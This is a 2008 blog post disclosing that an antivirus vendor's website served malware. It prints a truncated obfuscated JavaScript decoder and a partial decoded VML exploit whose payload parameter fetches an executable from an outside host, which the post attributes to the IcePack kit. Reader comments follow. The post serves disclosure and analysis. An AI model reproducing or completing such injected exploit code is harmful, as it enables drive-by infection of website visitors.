«
»

Antivirus company website is infected!!!

UPDATE(08/02): Malicious IFRAME has been removed . So Web-admins  should have knowledge of all various method of attacks  and keep update & audit their site/server.

What do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website. 
The same happened to Delhi (India) based  AVsoft Technologies’s antivirus website http://www.s-cop.com.
Their product “SmartCop Antivirus” is capable to detect malwares!

Infection is carried by exploiting common vulnerabilites using encrypted script. In this case it is like

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=Math.min(l,b);i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc(“gPjEXVXIadA4ie8IN0zSARiSdT8eNqcLfhpMNhiIpq8vnqCIoVX5DypIW……….

which decryptes to

<html xmlns:v=”urn:schemas-microsoft-com:vml”><head>
<object id=”VMLRender” classid=”CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E”>
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id=”myDivA”></div> 
<script language=”JavaScript”>  
 function bxdbSGIA(Z0gP3oql, Bwpp5g4P)
 {
  while (Z0gP3oql.length*2<Bwpp5g4P)  ….

function Attack(n)
 {…
‘<param name=”src” value=” http://ntkrnlpa[dot]info/rc/exe[dot]
………
Just see the screenshots below…

4.jpg

3.jpg

2.jpg

This all is used by the infamous (underground networks!!) tool “IcePack” . You can see below the admin console

1.jpg

Already reported to concerned authorities.

This entry was posted on February 6, 2008 at 5:14 pm and is filed under Uncategorized . You can follow any responses to this entry through the RSS 2.0 feed You can leave a response, or trackback from your own site.

4 Responses to “Antivirus company website is infected!!!”

  1. meneame.net Says:
    February 8, 2008 at 11:01 am

    Empresa de antivirus infecta a sus propios clientes (ENG)

    Empresa india que comercializa el antivirus SmartCop Antivirus, lo capa para que no detecte malware y hace uso de una vulnerabilidad para usar un script encriptado para colarles a sus clientes el soft IcePack, que es una herramienta para instalar malwa…

    Reply
  2. ianstarkc Says:
    February 8, 2008 at 12:40 pm

    Hay otros las porciones de la herramienta que hacen las mismas cosas como MPack, FirePack, la necesidad de WebAttackers..The es haber puesto al día softwares y asegurar el código que programa de modo que ninguna inyección de la IRF o del código

    Reply
  3. Anti Virus Says:
    February 27, 2008 at 5:56 am

    [...] Sarah wrote an interesting post today onHere’s a quick excerptWhat do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website. The same happened to Delhi (India) based … [...]

    Reply
  4. infobuc Says:
    May 24, 2008 at 7:59 am

    [...] What do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website.
    The same happened to Delhi (India) based AVsoft Technologies’s antivirus [...]

    Reply

Leave a Reply